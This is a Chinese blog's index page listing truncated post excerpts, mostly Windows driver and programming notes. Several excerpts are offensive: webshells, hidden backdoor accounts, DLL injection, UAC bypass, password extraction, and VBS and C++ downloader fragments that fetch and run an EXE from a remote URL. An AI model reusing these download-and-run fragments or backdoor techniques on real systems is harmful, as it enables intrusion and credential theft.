自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(75)
  • 资源 (1)
  • 收藏
  • 关注

转载 VC实现自动升级

把新程序打包放到你的服务器上,外加一个配置说明文件(ini或xml)。你的程序跑起来的时候,启动一个慢线程,下载你的配置说明文件(ini或xml),与本地的进行对照,如果一致就直接退出,如果有更新就接着下载到一个临时目录。这都是小意思了,重点是怎么覆盖原来的相应文件,因为系统跑起来的时候,文件是不能被删除和覆盖的。我的做法有四种一是如果只是某EXE或DLL有变化,那么先把本地的改名,然

2016-09-05 16:30:32 1075

原创 error LNK2005 的处理

编译vc6 使用静态库遇到的问题一:A、选择VC菜单Project->Settings->Link->Catagory选择Input,再在Ignore libraries 的Edit栏中填入你需要忽略的库,:Nafxcwd.lib libcpmtl.lib Libcmt.lib。B、选择VC菜单Project->Settings->Link->CatagoryGeneral,再

2016-09-01 21:41:40 475

转载 setsockopt()选项改善程序的健壮性

写出我在网络编程中的一点心得体会,希望对他(^_^也对大家)有帮助:1. 如果在已经处于 ESTABLISHED状态下的socket(一般由端口号和标志符区分)调用closesocket(一般不会立即关闭而经历TIME_WAIT的过程)后想继续重用该socket:BOOL bReuseaddr=TRUE;setsockopt(s,SOL_SOCKET ,SO_REUSEADDR,(

2016-01-19 20:07:12 530

转载 socket穿透代理代码(C++版)

写代码经常会遇到socket要通过代理连接服务器的情况,代理类型通畅有三种:HTTP、SOCK4和SOCK5,通过学习和网上参考相关代码,写了个代理类来实现该功能,贴出来与大家共享http://blog.csdn.net/bodybo/article/details/7274865

2013-12-04 08:13:01 956

转载 无进程无DLL无硬盘文件无启动项木马思路(转载)

现在网络上流行的木马后门类工具很多,但可以称为精品的则没有多少,大多数新手们还在使用Radmin一类的软件来替代后门程序。不幸的是,它们并不是一个真正的后门,极容易服务器管理员察觉,因此肉鸡经常飞掉也就很正常了。 一个合格的后门至少应该做到不能有陌生进程存在于任务管理器里,给后门进程起一个看起来像系统进程的名字只是掩耳盗铃;不能在注册表Run启动项或者服务启动项里留下众所周知的启动键值或新

2013-08-20 10:59:03 1121

转载 eval一句话木马原理详解

http://wenku.baidu.com/view/38795d1910a6f524ccbf8591.html

2013-08-19 09:55:11 1850

转载 Aspx 一句话木马和客户端(备用)

Aspx 一句话木马和客户端(备用)以下是引用片段:这个一句话不用说了!我之前已经发表文章讲解过!client端HTML页面代码如下以下是引用片段:I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320body,td{font-size: 12px;}table{T:expression(this.border='1

2013-08-19 09:53:21 2294

转载 IoCompleteRequest函数

一个 IRP 在过滤驱动中,把它分为需要安装 CompleteRoutine 的与无需安装 CompleteRoutine 的。那么在不需要安装 CompleteRoutine 的有以下几类情况。(1) 拿到这个 IRP 后什么都不做,直接调用 IoCompleteRequest() 来返回。(2) 拿到这个 IRP 后什么都不做,直接传递到底层设备,使用IoSkipCurrentIrpS

2013-08-19 09:34:38 1220

转载 Windows 文件过滤驱动经验总结

看了 ChuKuangRen 的《Windows文件系统过滤驱动开发教程(第二版).pdf》后,颇有感触。我想,交流都是建立在平等的基础上,在抱怨氛围和环境不好的同时应该先想一想自己究竟付出了多少?只知索取不愿付出的人也就不用抱怨了,要怪也只能怪自己。发自己心得的人无非是两种目的,一是引发一些讨论,好纠正自己错误的认识,以便从中获取更多的知识使自己进步的更快。二是做一份备忘,当自己遗忘的时候能够马

2013-08-19 09:32:52 582

转载 文件过滤驱动操作请求、结果

IRP_MJ_CREATE:消息会在新建和打开的请求中产生。            设置完成函数,等待本次新建结束以后才能够判断是新建还是打开。           //操作的请求,保存在(currentIrpStack->Parameters.Create.Options >> 24)&0xFF。            即 currentIrpStack->Parameter

2013-08-05 15:35:53 879

转载 Adsutil.vbs 在脚本攻击中的妙用

作者:我非我 本文发表在2005.2期上.转载时请注明一、简单介绍 adsutil.vbs是什么?相信用过IIS的网管员不会不知道。这是IIS自带的提供于命令行下管理IIS的一个脚本。位于%SystemDrive%\Inetpub\AdminScripts目录下。足足有95,426字节大小。这么大的脚本一看就知道功能强大。事实也的确如此。基本上我的感觉它就是个命令行下的

2013-07-26 10:39:49 650

转载 VBS模拟Post上传文件失败

目的:通过VBS上传本地的文件到服务端。服务端接受文件:upload_file.php图形操作界面:upload.php通过Wireshark抓包看到:VBS模拟Post的数据包和通过IE手工发送完全一样,但是服务器端就是不认,哪个地方出错了呢?代码如下:VBScript code:'''客户端文件upload.vbsDim objFile,fileContentSet o

2013-07-26 10:38:16 695

转载 添加隐藏的不死帐号的VBS脚本

添加隐藏的不死帐号的VBS脚本给服务器添加隐藏的不死帐号的VBS脚本的方法,网上看到的,不知道是否有用,主要是先留下来,以后有时间研究一下原理是什么,如果真能实现彻底隐藏,那么就太厉害了。1. door.vbs'***************'door.vbs by 黑嘿黑'***************dim wsh,FA,FSOset fso=CreateObj

2013-07-26 10:37:08 1139

转载 VBS 下载指定URL地址EXE文件并运行命令:

set xPost = createObject("Microsoft.XMLHTTP") xPost.Open "GET","http://down.xxsafe.com/setup.exe",0xPost.Send() Set sGet = createObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Ope

2013-07-25 09:59:43 2375

转载 通过高级搜索指令挖掘各种程序外链资源

http://www.seosjh.com/156.html

2013-06-25 17:40:11 499

原创 软件天堂

http://www.softonic.cn/ 2010-06-13 10:57 驱动实现win7下cmd提权

2013-02-08 08:37:26 527

转载 反调试1

//用调试器载入并运行后,调试器会一片空白#include #define ThreadHideFromDebugger 17typedef DWORD (WINAPI *ZW_SET_INFORMATION_THREAD)(HANDLE,DWORD,PVOID,ULONG);int APIENTRY WinMain(HINSTANCE hInstance,

2012-07-26 16:29:06 520

转载 ATAPI(磁盘端口驱动)级文件保护简单实现

ATAPI(磁盘端口驱动)级文件保护简单实现#define IoGetIrpStackLocation( Irp , Level) (\    (Irp)->Tail.Overlay.CurrentStackLocation + Level )BOOL IfIrpHasFobj(PIRP pIrp , LPCWSTR FileName){ULONG i , j ; PI

2012-07-18 09:59:59 739

转载 青松卓然 js2854的博客 [MiniFilter]驱动隐藏文件夹的实现(支持Win7)

青松卓然js2854的博客[MiniFilter]驱动隐藏文件夹的实现(支持Win7)http://www.cnblogs.com/js2854/archive/2010/11/03/HideDir.html刚完成一个利用驱动隐藏文件夹的程序,隐藏文件的类似,现在贴出来共享给大家。代码相对比较简单,我是在别人代码的基础上改的。因为现在在网上找到的代码

2012-07-18 08:56:47 2576

转载 一个下载者代码

自己写的一个下载者代码,为了减小程序的体积,所以用到的一些函数使用动态加载DLL,内嵌汇编的方式调用#include //CodyBy:xets007bool DownLoadFile(char *szUrl,char *szFile);void main(){char szUrl[]="http://127.0.0.1/test.exe";char szFile[]=

2012-06-20 16:15:24 1001

转载 ring0 APC插dll

ring0 APC插dll...........虽然来自代码流氓...XX原因不在空间发....不过Sudami牛发了...俺就把代码帖上来吧...呵呵........不许做坏事哦....高手飘过     ----by sysnap         #include #define MAX_PID 65535/////////////////////////////////

2012-06-20 10:45:53 567

转载 插入apc的方式 实现dll注入

测试了一下 插入Explorer是可以的    但是不保证插入每一个进程都会成功。BOOL UseApcInsertDll(DWORD dwProcessID, char *strDllName){//打开进程HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID);if (hProcess ==

2012-06-20 10:39:37 862

转载 手工加载未注册的 COM 组件

手工加载未注册的 COM 组件http://www.cppblog.com/sleepwom/archive/2010/02/16/107921.html二 14, 2010有时候我们运行程序的时候, 可能某个组件在系统内并不存在, 所以我们自己将这个组件打包在我们的安装包内, 但并不将其注册进系统. 这样做的目的就是尽量少的影响原有的系统. 组件只是在我们的应

2012-05-23 16:14:14 1107

转载 sys防静态反汇编破解

nt i=0x9864int b=1;i+=b;int c=i;if i=cxxxxelsexxxx

2012-02-21 16:36:23 918

转载 win7中隐藏的"上帝模式"+详解

Windows 7系统中隐藏了一个秘密的“God Mode”,字面上译为“上帝模式”。God Mode其实就是一个简单的文件夹窗口,但包含了几乎所有Windows 7系统的设置,如控制面板的功能、界面个性化、辅助功能选项...方方面面的控制设置,用户只需通过这一个窗口就能实现所有的操控,而不必再去为调整一个小小的系统设置细想半天究竟该在什么地方去打开设置窗口。怎么样?God Mode,之前大家是闻

2012-01-12 09:45:16 1051

原创 对"ZwLoadDriver加载驱动" 的补充

在加载之前最好要先进行提权工作。

2011-12-16 09:07:16 761

转载 域环境下的渗透

在进行内网渗透,尤其是在比较大型的网络环境下,很可能会遇到域这样一种特殊的网络环境,而在域环境下的内网渗透又将是另外一片天地。首先还是先简要看一下域的概念吧:域 (Domain)是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即TrustRelation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后,2个域之间不但可以按需要相互进行管理,还可

2011-12-13 08:36:08 507

转载 VC编程实现IE7 IE8 IE9自动完成口令获取

/****************************************************************************************************都是网上的代码,自己组合起来的,刚开始报很多错误,花了很多时间终于搞定了环境:VC6.0+SDK(SDK必须)简单说明:IE7 IE8将网站的URL保存于历史文件中,将自动完成的密码保存

2011-12-02 15:13:36 585

转载 RAID5重组C代码

/****************************************************************************\*                                                                            **  raidrec v0.6 - Manually try to put a

2011-11-23 11:04:11 591

转载 用OpenCV显示一幅图像到指定的窗体

找了好久,没找到相应函数,于是参照cv::imshow的源代码,搞出来一份。(OpenCV不简洁明了,学习的成本大于2天我就觉得太不值得了,下周准备试试CxImage)#include "highgui.h"#ifdef _DEBUG     #pragma comment( lib, "opencv_core220d.lib" )     #pragma comment(

2011-11-23 08:19:25 1714

转载 读取NTFS的USN(获取文件的历史操作记录,即使这个文件已被删除)

上回说到NTFS USN会记录下文件的所有操作,但默认情况下并没有激活这一功能,所以不用担心。在非激活状态,它也只剩下快速查找文件的功能。这回,假设USN JOURNAL被激活了(你可以用控制台命令fsutil usn,或上回说到的FSCTL_CREATE_USN_JOURNAL来开启这一功能),怎么回窥过去的操作?为此,写了段代码来进行试验,程序是检索 123.txt 操作历史(记录空间

2011-11-23 08:17:22 3874

转载 读取NTFS的USN(快速检索文件)

有个名叫Everything的软件,搜索文件飞快,看了一下原理,原来NTFS会记录文件的所有操作,也就是说即便文件被删除了,通过USN记录仍然可以知道文件名等部分信息。于是准备写个程序删掉这个信息,但研究了一下,发现它默认其实是关闭的,也就是没必要担心信息外漏。#define _CRT_SECURE_NO_WARNINGS#include #include #include

2011-11-23 08:16:44 4688

转载 如何在CSDN博客添加友情链接

以前的CSDN博客系统在空间里面可以添加链接的模块,但是现在这个模块被取消了 ,那么我们就不能收藏和推荐好的网站和博客了么?NO,上有政策,咱们下有对策。经过研究,我发现可以这样来添加友情链接。首先,进入博客设置,找到博客栏目。在里面新建一个栏目,名字随便,我这叫

2011-10-09 08:25:17 350

原创 今天发现的一个有用命令

win系统自带的解压缩命令makecab和expand  利用系统自带的makecab和expand来解压缩 压缩一个文件: makecab c:\ls.exe ls.zip 解压一个文件: expand c:\ls.zip c

2011-09-29 10:55:34 455

转载 嘿咻Win7'UAC

fireworm同学的翻译:原文在http://www.pretentiousname.com/misc/win7_uac_whitelist2.html我只翻译了其中关于原理的一小部分,有兴趣的可以自己去看看。Win7的UAC与Vista不同,鉴于前作糟糕的设计,为了减

2011-09-24 15:11:58 522

转载 Windows 7开发:用户帐户管理数据重定向(写入受保护的资源)

http://www.bianceng.cn/Programming/net/201104/26176.htm您可能遇到过下面的一种或多种情况:• 您的应用程序写入Program Files ,Windows目录,或者系统根(一般是C盘)文件夹,但是您在这些地方并没有找到您的文件• 您的应用程序写入Windows注册表,特别是HKLM/Software中,但是您没有看 到注册表进行了更

2011-09-20 16:16:36 391

转载 Delphi在Vasta/win 7下通过UAC控制

在Windows编程时,为了兼容Win7与XP,许多需要底层权限的程序需要通过UAC验证,这是微软出的一个很恶心的东西……还不如Ubuntu那种Root机制呢……但是有困难我们就要克服~现在有一种方式可以变相的绕过UAC控制。其实UAC控制有一点很弱智的是,当你的程序名字中包

2011-09-20 16:15:23 489

转载 Vista/Win7下的直接磁盘写入

2010年06月21日 21:53Vista/Win7的安全性有很大提高,对于磁盘的直接写入的防护就是其中一个方面。详情我这里不多说,你可以自己参考MJ0011的《VISTA & WIN7对直接磁盘写入的防护》。在文件系统层和磁盘层,都对磁盘直接写入有了防护。具体地,

2011-09-20 16:14:40 834

转载 隐藏驱动完整攻略(猥琐篇)

基础篇里说的那些东西搞完以后,任何正常的位置都找不到我们的Driver了,此时相应的手段基本上只剩下暴搜PE镜像或暴搜DriverObject了。而且,基础篇讲的那些东西,因为都是M$定好的一些格式和位置,代码怎么写都差不多,固定的路子而已。而抹PE镜像或抹DriverObjec

2011-09-20 16:13:05 4464 1

转载 隐藏驱动完整攻略(基础篇)

完整介绍隐藏驱动的方法,部分内容属于冷饭热炒,炒一炒比较好消化~~先说一下,以下数据和结构信息来自Windbg+WinXP SP2一、从PsLoadedModuleList消失PsLoadedModuleList是系统中一个用于连接所有已加载驱动的双向链表(LIST_

2011-09-20 16:12:35 2548

DriveLoad

DriveLoad

2012-02-23

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除